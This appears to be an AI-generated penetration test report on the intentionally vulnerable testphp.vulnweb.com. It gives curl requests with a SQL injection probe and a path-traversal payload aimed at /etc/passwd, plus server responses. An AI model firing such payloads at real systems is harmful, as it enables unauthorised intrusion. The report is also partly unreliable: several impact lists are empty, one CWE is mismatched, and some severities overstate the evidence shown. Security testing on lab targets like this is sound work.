AI-Powered Security Assessment Report
A comprehensive penetration test was conducted against testphp.vulnweb.com, a deliberately vulnerable web application used for security testing. The assessment identified multiple critical vulnerabilities including SQL injection, Local File Inclusion (LFI), information disclosure, and HTTP Parameter Pollution. These vulnerabilities pose significant security risks and require immediate remediation.
| Field | Value |
|---|---|
| Severity | Critical |
| CVSS | 9.8 |
| CWE | CWE-89 |
| Location | http://testphp.vulnweb.com/listproducts.php |
The cat parameter in listproducts.php is vulnerable to SQL injection. The application fails to properly sanitize user input, allowing attackers to manipulate SQL queries and potentially extract sensitive database information.
Request:
curl -s -k "http://testphp.vulnweb.com/listproducts.php?cat=1'"
Payload:
cat=1'
Response Evidence:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
The application returns a different response structure when a single quote is injected, indicating the SQL query is being modified and the application is vulnerable to SQL injection.
An attacker could exploit this vulnerability to:
| Field | Value |
|---|---|
| Severity | High |
| CVSS | 8.6 |
| CWE | CWE-22 |
| Location | http://testphp.vulnweb.com/showimage.php |
The file parameter in showimage.php is vulnerable to Local File Inclusion (LFI). The application attempts to open files based on user input without proper validation, allowing attackers to potentially access sensitive system files.
Request:
curl -s -k "testphp.vulnweb.com/showimage.php?file=....//....//....//etc/passwd"
Payload:
file=....//....//....//etc/passwd
Response Evidence:
Warning: fopen(....//....//....//etc/passwd): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 13
Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 19
The error messages reveal the server-side file path structure (/hj/var/www/showimage.php) and confirm that the application is attempting to open files based on user input.
An attacker could exploit this vulnerability to:
| Field | Value |
|---|---|
| Severity | Medium |
| CVSS | 5.3 |
| CWE | CWE-209 |
| Location | http://testphp.vulnweb.com/showimage.php |
The application exposes sensitive information through detailed error messages, revealing server-side file paths and internal application structure.
Request:
curl -s -k "testphp.vulnweb.com/showimage.php?file=....//....//....//etc/passwd"
Payload:
file=....//....//....//etc/passwd
Response Evidence:
Warning: fopen(....//....//....//etc/passwd): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 13
Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 19
Information disclosure can help attackers:
| Field | Value |
|---|---|
| Severity | Low |
| CVSS | 3.7 |
| CWE | CWE-444 |
| Location | http://testphp.vulnweb.com/hpp/ |
The application contains an HTTP Parameter Pollution (HPP) example page that demonstrates how duplicate parameters can be manipulated to bypass security controls.
Request:
curl -s -k "testphp.vulnweb.com/hpp/?pp=12"
Payload:
pp=12
Response Evidence:
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/>
<a href="params.php?p=valid&pp=12">link1</a><br/><a href="params.php?p=valid&pp=12">link2</a><br/><form action="params.php?p=valid&pp=12"><input type=submit name=aaaa/></form><br/>
<hr>
<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>
HTTP Parameter Pollution can potentially:
| # | Vulnerability | Severity | URL |
|---|---|---|---|
| 1 | SQL Injection | Critical | http://testphp.vulnweb.com/listproducts.php |
| 2 | Local File Inclusion | High | http://testphp.vulnweb.com/showimage.php |
| 3 | Information Disclosure | Medium | http://testphp.vulnweb.com/showimage.php |
| 4 | HTTP Parameter Pollution | Low | http://testphp.vulnweb.com/hpp/ |